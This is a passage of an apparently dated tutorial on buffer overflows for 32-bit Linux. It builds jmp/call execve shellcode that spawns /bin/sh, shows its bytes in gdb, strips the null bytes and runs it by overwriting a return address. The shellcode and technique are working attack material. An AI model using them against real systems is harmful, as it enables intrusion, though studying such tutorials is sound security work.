?? introduction to buffer overflow.htm
字號:
<br><b>Now lets take a look in execve function</b>
<br>
<br>__execve+1 mov 0x10(%esp,1),%edx
<br><b>We must have address of 3rd argument in %edx(NULL was 3rd argument)</b>
<br>
<br>__execve+5 mov 0xc(%esp,1),%ecx
<br><b>We must have address of sh in %ecx(sh was 2nd argument)</b>
<br>
<br><br>__execve+9 mov 0x8(%esp,1),%ebx
<br><b>We must have address of "/bin/sh" in %ebx(sh[0] 1st argument)</b>
<br>
<br>__execve+13 mov $0xb,%eax
<br><b>0xb is system call for execve</b>
<br>
<br>__execve+18 int $0x80
<br><b>switching to kernel mode</b>
</center>
<br>
<br>
<p>Things to do-></p>
<br>We must have address of NULL in %edx
<br>We must have address of sh in %ecx
<br>We must have address of "/bin/sh" in %ebx
<br>We must have 0xb in %eax
<br>We must call int $0x80
<p>Well we need the exact address in memory of our "/bin/sh" string.
We can simple put "/bin/sh" after call which will push EIP on stack,and
pushed EIP should be address of our string...Look at pic 0.1</p>
<br>
<center>
<br>[JJaaaaaaaaaaaaaaaaaaaaaaaaCCssssss]
<br> |^_______________________^|
<br> |________________________|
</center>
<br>
<p>on beginning of code we will put JMP instruction which will jmp to call,and
call will save EIP and go to offset of a.EIP will be our "/bin/sh" address</p>
<br>a-stands for code
<br>J-stands for JMP
<br>C-stands for CALL
<br>s-stands for "/bin/sh"
<p>well lets write this to asm-></p>
<br>
<br>
<center>
<br>------------ shell1.cpp Code Starts Here ----------------
<br>void main(){
<br>__asm__("jmp 0x1e \n" //jmp to call
<br>"popl %esi \n" //get seved EIP to esi,now we have /bin/sh address
<br>"movl %esi,0x8(%esi) \n" //address of sh behind /bin/sh
<br>"movl $0x0,0xc(%esi) \n" //NULL as 3rd argument goes after sh address
<br>"movb $0x0,0x7(%esi) \n" //terminate /bin/sh with '\0'
<br>"movl %esi,%ebx \n" //address of sh[0] in %ebx
<br>"leal %0x8(%esi),%ecx \n" //address of sh in %ecx(2nd argument)
<br>"leal %0xc(%esi),%edx \n" //address of NULL in %edx(3rd argument)
<br>"movl $0xb,%eax \n" //sys call of execve in %eax
<br>" int $0x80 \n" //kernel mode
<br>" call -0x23 \n" //call popl %esi
<br>" .string \"/bin/sh\" \n"); //our string
<br>}
<br>------------ shell1.cpp Code Ends Here ----------------
</center>
<br>
<br>
<p>Lets compile this</p>
<br>
<center>
<br>root@scorpion#cc shel1.cpp -o shell1
<br>root@scorpion#gdb shell1
<br>GNU gdb 4.18
<br>Copyright 1998 Free Software Foundation, Inc.
<br>GDB is free software, covered by the GNU General Public License, and you are
<br>welcome to change it and/or distribute copies of it under certain conditions.
<br>Type "show copying" to see the conditions.
<br>There is absolutely no warranty for GDB. Type "show warranty" for details.
<br>This GDB was configured as "i686-pc-linux-gnu"...
<br>(gdb) x/bx main+3 <-------jmp start here
<br>0x8048733 <main+3>: 0xeb
<br>(gdb)
<br>0x8048734 <main+4>: 0x1e
<br>(gdb)
<br>0x8048735 <main+5>: 0x5e
<br>(gdb)
<br>0x8048736 <main+6>: 0x89
<br>(gdb)
<br>0x8048737 <main+7>: 0x76
<br>(gdb)
<br>0x8048738 <main+8>: 0x08
<br>(gdb)
<br>0x8048739 <main+9>: 0xc6
<br>(gdb)
<br>0x804873a <main+10>: 0x46
<br>(gdb)
<br>0x804873b <main+11>: 0x07
<br>(gdb)
<br>0x804873c <main+12>: 0x00
<br>(gdb)
<br>0x804873d <main+13>: 0xc7
<br>(gdb)
<br>0x804873e <main+14>: 0x46
<br>(gdb)
<br>0x804873f <main+15>: 0x0c
<br>(gdb)
<br>0x8048740 <main+16>: 0x00
<br>(gdb)
<br>0x8048741 <main+17>: 0x00
<br>(gdb)
<br>0x8048742 <main+18>: 0x00
<br>(gdb)
<br>0x8048743 <main+19>: 0x00
<br>(gdb)
<br>0x8048744 <main+20>: 0x89
<br>(gdb)
<br>0x8048745 <main+21>: 0xf3
<br>(gdb)
<br>0x8048746 <main+22>: 0x8d
<br>(gdb)
<br>0x8048747 <main+23>: 0x4e
<br>(gdb)
<br>0x8048748 <main+24>: 0x08
<br>(gdb)
<br>0x8048749 <main+25>: 0x8d
<br>(gdb)
<br>0x804874a <main+26>: 0x56
<br>(gdb)
<br>0x804874b <main+27>: 0x0c
<br>(gdb)
<br>0x804874c <main+28>: 0xb8
<br>(gdb)
<br>0x804874d <main+29>: 0x0b
<br>(gdb)
<br>0x804874e <main+30>: 0x00
<br>(gdb)
<br>0x804874f <main+31>: 0x00
<br>(gdb)
<br>0x8048750 <main+32>: 0x00
<br>(gdb)
<br>0x8048751 <main+33>: 0xcd
<br>(gdb)
<br>0x8048752 <main+34>: 0x80
<br>(gdb)
<br>0x8048753 <main+35>: 0xe8
<br>(gdb)
<br>0x8048754 <main+36>: 0xdd
<br>(gdb)
<br>0x8048755 <main+37>: 0xff
<br>(gdb)
<br>0x8048756 <main+38>: 0xff
<br>(gdb)
<br>0x8048757 <main+39>: 0xff
<br>(gdb)
<br>0x8048758 <main+40>: 0x2f
<br>(gdb)
<br>0x8048759 <main+41>: 0x62
<br>(gdb)
<br>0x804875a <main+42>: 0x69
<br>(gdb)
<br>0x804875b <main+43>: 0x6e
<br>(gdb)
<br>0x804875c <main+44>: 0x2f
<br>(gdb)
<br>0x804875d <main+45>: 0x73
<br>(gdb)
<br>0x804875e <main+46>: 0x68 <--------- c0de ends here
<br>(gdb)quit
</center>
<br>
<br>
<p>lets write our shell code-></p>
<br>
<br>
<br><center>
<br>--------------- shell2.cpp Code Starts Here ------------------
<br>char c0de[]=
<br>"\xeb\x1e\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00"
<br>"\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb8\x0b\x00\x00\x00"
<br>"\xcd\x80\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
<br>
<br>int main(){
<br>char buf[5];
<br>long *ret=(long *)(buf+12);
<br>*ret=(long)c0de;
<br>}
<br>--------------- shell2.cpp Code Ends Here ------------------
<br>root@scorpion#cc shell2.cpp -o shell2
<br>root@scorpion#./shell2
<br>sh-2.03
</center>
<br>
<br>
<p>This works...
"\x2f\x62\x69\x6e\x2f\x73\x68" is same that if you wrote "/bin/sh"
(this is at end of code)
Take a look at this shell code...There is \x00 or '\0' at some places.
As we know '\0' is end of string.
So strcpy or other string function will copy it while they find '\0'
and our shell code wouldn't be copied all.
Lets get rid of this '\0'</p>
<br>
<br>
<center>
<br>change this for this
<br>-----------------------------------------------------
<br> xorl %eax,%eax (this we will add)
<br>movb $0x0,0x7(%esi) movb %al,0x7(%esi)
<br>movl $0x0,0xc(%esi) movl %eax,0xc(%esi)
<br>movl $0xb,$eax movb %0xb,%al
<br>-----------------------------------------------------
</center>
<br>
<br>
<p>rewrite c0de with this changes and we get this</p>
<br>
<br>
<center>
<br>--------------- shell3.cpp Code Starts Here ---------------
<br>void main(){
<br>__asm__("jmp 0x18 \n"
<br> "popl %esi \n"
<br> "movl %esi,0x8(%esi) \n"
<br> "xorl %eax,%eax \n"
<br> "movb %al,0x7(%esi) \n"
<br> "movl %eax,0xc(%esi) \n"
<br> "movl %esi,%ebx \n"
<br> "leal 0x8(%esi),%ecx \n"
<br> "leal 0xc(%esi),%edx \n"
<br> "movb $0xb,%al \n"
<br> "int $0x80 \n"
<br> "call -0x1d \n"
<br> ".string \"/bin/sh\" \n");
<br>}
<br>--------------- shell3.cpp Code Ends Here ---------------
</center>
<br>
<br>
<p>compile like this</p>
<br>
<center>
<br>root@scorpion#cc shell3.cpp -o shell3
<br>root@scorpion#gdb shell3
<br>GNU gdb 4.18
<br>Copyright 1998 Free Software Foundation, Inc.
<br>GDB is free software, covered by the GNU General Public License, and you are
<br>welcome to change it and/or distribute copies of it under certain conditions.
<br>Type "show copying" to see the conditions.
<br>There is absolutely no warranty for GDB. Type "show warranty" for details.
<br>This GDB was configured as "i686-pc-linux-gnu"...
<br>(gdb) x/bx main+3 <---------jmp strats here
<br>0x80483c3 <main+3>: 0xeb
<br>(gdb)
<br>0x80483c4 <main+4>: 0x18
<br>(gdb)
<br>0x80483c5 <main+5>: 0x5e
<br>(gdb)
<br>0x80483c6 <main+6>: 0x89
<br>(gdb)
<br>0x80483c7 <main+7>: 0x76
<br>(gdb)
<br>0x80483c8 <main+8>: 0x08
<br>(gdb)
<br>0x80483c9 <main+9>: 0x31
<br>(gdb)
<br>0x80483ca <main+10>: 0xc0
<br>(gdb)
<br>0x80483cb <main+11>: 0x88
<br>(gdb)
<br>0x80483cc <main+12>: 0x46
<br>(gdb)
<br>0x80483cd <main+13>: 0x07
<br>(gdb)
<br>0x80483ce <main+14>: 0x89
<br>(gdb)
<br>0x80483cf <main+15>: 0x46
<br>(gdb)
<br>0x80483d0 <main+16>: 0x0c
<br>(gdb)
<br>0x80483d1 <main+17>: 0x89
<br>(gdb)
<br>0x80483d2 <main+18>: 0xf3
<br>(gdb)
<br>0x80483d3 <main+19>: 0x8d
<br>(gdb)
<br>0x80483d4 <main+20>: 0x4e
<br>(gdb)
<br>0x80483d5 <main+21>: 0x08
<br>(gdb)
<br>0x80483d6 <main+22>: 0x8d
<br>(gdb)
<br>0x80483d7 <main+23>: 0x56
<br>(gdb)
<br>0x80483d8 <main+24>: 0x0c
<br>(gdb)
<br>0x80483d9 <main+25>: 0xb0
<br>(gdb)
<br>0x80483da <main+26>: 0x0b
<br>(gdb)
<br>0x80483db <main+27>: 0xcd
<br>(gdb)
<br>0x80483dc <main+28>: 0x80
<br>(gdb)
<br>0x80483dd <main+29>: 0xe8
<br>(gdb)
<br>0x80483de <main+30>: 0xe3
<br>(gdb)
<br>0x80483df <main+31>: 0xff
<br>(gdb)
<br>0x80483e0 <main+32>: 0xff
<br>(gdb)
<br>0x80483e1 <main+33>: 0xff
<br>(gdb)
<br>0x80483e2 <main+34>: 0x2f
<br>(gdb)
<br>0x80483e3 <main+35>: 0x62
<br>(gdb)
<br>0x80483e4 <main+36>: 0x69
<br>(gdb)
<br>0x80483e5 <main+37>: 0x6e
<br>(gdb)
<br>0x80483e6 <main+38>: 0x2f
<br>(gdb)
<br>0x80483e7 <main+39>: 0x73
<br>(gdb)
<br>0x80483e8 <main+40>: 0x68 <---------c0de ends here
<br>(gdb)quit
</center>
<br>
<br>
<p>rewrite program:</p>
<br>
<br>
<center>
<br>-------------- shell4.cpp Code Starts Here ----------------
<br>char c0de[]=
<br>"\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3"
<br>"\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff\x2f"
<br>"\x62\x69\x6e\x2f\x73\x68";
<br>
<br>void main(){
<br>char buf[5];
<br>long *ret=(long *)(buf+12);
<br>*ret=(long)c0de;
<br>}
<br>-------------- shell4.cpp Code Ends Here ----------------
<br>compile shell4.cpp
<br>root@scorpion#cc shell4.cpp -o shell4
<br>root@scorpion#./shell4
<br>sh-2.03#
</center>
<br>
<br>
<p>It works...and it is smaller then our previous c0de and without 0x00 or
\x00 or '\0' so strcpy(),sprintf() will copy it at all...</p>
<p>Here is simple program to print Stack pointer of current program:</p>
<br>
<br>
<center>
<br>------- sp.cpp Code Stars Here-----------
<br>unsigned long get_esp(){
<br>__asm__(" movl %esp,%eax \n");
<br>}
<br>
<br>void main(){
<br>printf(" Stack pointer is 0x%x%\n",get_esp());
<br>}
<br>------- sp.cpp Code Ends Here-----------
<br>root@scorpion#cc sp.cpp -o sp
<br>root@scoprion#./sp
<br>Stack pointer is 0xbffff910 <--- your output will be other address or same
<br>root@scorpion#
</center>
<br>
<br>
Text was writen using vi and joe text editors
<br>
-EOF-
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -